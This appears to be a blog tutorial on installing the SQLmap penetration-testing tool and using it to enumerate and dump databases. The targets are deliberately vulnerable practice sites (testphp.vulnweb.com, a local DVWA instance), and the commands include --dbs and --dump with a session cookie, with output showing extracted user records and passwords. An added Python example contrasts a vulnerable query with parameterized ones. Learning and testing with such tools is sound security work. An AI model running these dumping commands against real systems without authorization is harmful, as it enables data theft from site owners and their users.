SQLmap Install

By alexxk5111

SQL injection is one of the most critical and prevalent vulnerabilities in enterprise security to date. SQLmap is a popular open source tool that helps penetration testers detect and exploit SQL injection flaws automatically. This Python-based tool helps testers take over database servers. Above all, if you are interested in learning this tool, you can learn it with the help of a sqlmap tutorial and by joining a good course.

It features a powerful detection engine and many options that support penetration testing. You will find switches for database fingerprinting, data fetching and executing commands on the operating system.

SQLmap can be used for the following:

  • Scan web apps against SQL injection vulnerability
  • Exploit SQL injection vulnerability
  • Extract databases and database user details entirely
  • Bypass Web Application Firewall (WAF) by using tamper scripts
  • Own the underlying operating system

Key Features of SQLmap Testing Tool

  • Supports MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB DBMSs.
  • Fully supports six SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
  • Supports cracking password hash formats using a dictionary-based attack
  • Allows enumeration of users, password hashes, privileges, roles, databases, tables and columns

So, if you want to learn SQLmap, check the following quick SQLmap tutorials. Also, get familiar with the best resources to learn SQLmap as a beginner.

How to use SQLmap on Windows?

Here is the simple and easy process to set up and install SQLmap on Windows:

Step 1: First, Download and Install Python

The SQLmap tool is written in Python, so the first thing you require is the Python interpreter. Go to python.org to download the Python interpreter.

SQLmap runs smoothly with both series of Python, 2.7.x and 3.3.x.

Step 2: Download and Install SQLmap

  • Download the SQLmap zip file from sqlmap.org.
  • Extract the downloaded SQLmap zip file in a desired directory.
  • Open the DOS prompt and go to the SQLmap directory.
  • Run the sqlmap.py code with the Python interpreter.

SQLmap Tutorial For Kali Linux

Boot into your Kali Linux machine. Start a terminal and type:

sqlmap -h

It will list the basic options supported by SQLmap. Start with a simple command:

sqlmap -u <URL to inject>

In this tutorial, it will be:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Use --time-sec to speed up the process in case of slow server responses:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

It will show the MySQL version along with useful information about the database.

SQLmap may ask some questions that have to be answered with yes or no. Type N for no and Y for yes.

Enumeration

Obtain the names of available databases by adding --dbs to the previous command:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Table

Specify the desired database using -D and tell SQLmap to list the tables using the --tables option. So, the final SQLmap command will be:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result would be:

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Columns

Specify the database using -D, the table using -T and list the columns using --columns:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

It will give you a result like this:

Database: acuart
Table: users

[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
+---------+--------------+

Data

As usual, use -D for the database, -T for the table, -C for the columns and --dump for the data. The final command to fetch data will appear as shown below:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C phone,name,pass --dump

The output would be:

[15:41:00] [INFO] fetching columns 'email, name, pass' for table 'users' in database 'acuart'
[15:41:01] [INFO] the SQL query used returns 4 entries
[15:41:04] [INFO] retrieved: pass
[15:41:08] [INFO] retrieved: varchar (100)
[15:41:09] [INFO] retrieved: email
[15:41:08] [INFO] retrieved: varchar (100)
[15:41:10] [INFO] retrieved: name
[15:41:14] [INFO] retrieved: varchar (100)
[15:41:14] [INFO] fetching entries of column(s) 'email, name, pass' for table 'users' in database 'acuart'
[15:41:14] [INFO] the SQL query used returns 1 entries
[15:41:16] [INFO] retrieved: [email protected]
[15:41:20] [INFO] retrieved: John Smith
[15:41:22] [INFO] retrieved: test
[15:41:22] [INFO] analyzing table dump for possible password hashes

Database: acuart
Table: users
[1 entry]
+------+------------+-------------------+
| pass | name       | email             |
+------+------------+-------------------+
| test | John Smith | [email protected] |
+------+------------+-------------------+

SQLmap Tutorial Windows

This tutorial explains how to use SQLmap for exploiting a vulnerable web application. To properly understand this tutorial, you need to know how database-driven web apps work. In this tutorial, we will consider PHP+MySQL.

Vulnerable URL

Suppose your web application has the following URL, and it is prone to SQL injection:

http://www.example.com/section.php?id=51

It is vulnerable to SQL injection because the developer didn't properly escape the id parameter. You can test it simply by adding a single quote (') at the end of the URL string and trying to open it:

http://www.example.com/section.php?id=51'

If the URL responds with an error or reacts unexpectedly, it means the database received the unexpected single quote, which the web app failed to escape properly. In this case, the input parameter "id" is prone to SQL injection.
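
The quote test above, from the developer's side, as an added example that is not part of the original article. Python's sqlite3 with an in-memory table stands in for the PHP+MySQL backend (an assumption), and the table, rows and function names are constructed for illustration. It shows the concatenated query failing on id=51' and the same value handled as plain data once it is bound as a parameter.

```python
import sqlite3

def make_db():
    # Constructed sample data; in-memory SQLite stands in for the page's MySQL.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sections (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO sections VALUES (?, ?)",
                     [(51, "News"), (52, "Contact")])
    return conn

def fetch_vulnerable(conn, raw_id):
    # "Before": the request value is pasted into the SQL text, so a stray
    # quote changes the statement the database has to parse.
    return conn.execute(
        "SELECT title FROM sections WHERE id = " + raw_id).fetchone()

def fetch_bound(conn, raw_id):
    # "After": the value travels as a bound parameter and is only ever data.
    return conn.execute(
        "SELECT title FROM sections WHERE id = ?", (raw_id,)).fetchone()

def fetch_validated(conn, raw_id):
    # Defence in depth: id is numeric, so reject anything else before the query.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return None
    return fetch_bound(conn, int(raw_id))

def outcome(fetch, conn, raw_id):
    # Classify what the visitor would see: a row, an empty page, or a DB error.
    try:
        row = fetch(conn, raw_id)
    except sqlite3.Error as exc:
        return "db-error: " + type(exc).__name__
    return "row: " + row[0] if row else "no-row"

if __name__ == "__main__":
    conn = make_db()
    for raw in ("51", "51'"):   # the two requests from the text above
        for fetch in (fetch_vulnerable, fetch_bound, fetch_validated):
            print(f"{raw!r:6} {fetch.__name__:17} {outcome(fetch, conn, raw)}")
```

Only the concatenated version turns the trailing quote into a database error; the bound and validated versions return an empty result for it.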

SQLmap Dump Table

To dump the data present in a table, use "--dump". The command will look like:

In Windows

python sqlmap.py ^
  --url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" ^
  --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" ^
  -D dvwa -T users -C user_id,user,password --dump

In Linux

./sqlmap.py \
  --url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \
  --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" \
  -D dvwa -T users -C user_id,user,password --dump

--dump tells SQLmap to dump all the entries in the table, and the --cookie option carries the session so that access is maintained while attacking.

How to install SQLmap on Ubuntu?

Step 1: Download SQLmap to your machine using this command:

wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz

It will download SQLmap on your machine from GitHub into your current directory.

Step 2: Use this command to extract your SQLmap package from the tar file:

tar -xvf sqlmap.tar.gz

Step 3: Go to your SQLmap directory and run the following command:

cd sqlmapproject-sqlmap-c4f9e66/
python sqlmap.py --version

It will test SQLmap on Ubuntu.